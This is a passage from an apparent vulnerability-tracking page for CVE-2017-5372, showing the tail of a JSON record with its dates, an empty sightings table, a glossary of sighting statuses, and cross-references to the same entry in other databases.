      "lastModifiedDate": "2018-12-10T19:29Z",
      "publishedDate": "2017-01-23T21:59Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

cve-2017-5372

Vulnerability from cvelistv5

ghsa-8fqv-mx8w-2w8h

Vulnerability from github

var-201701-0793

Vulnerability from variot

fkie_cve-2017-5372

Vulnerability from fkie_nvd

gsd-2017-5372

Vulnerability from gsd

Tags

Sightings

Nomenclature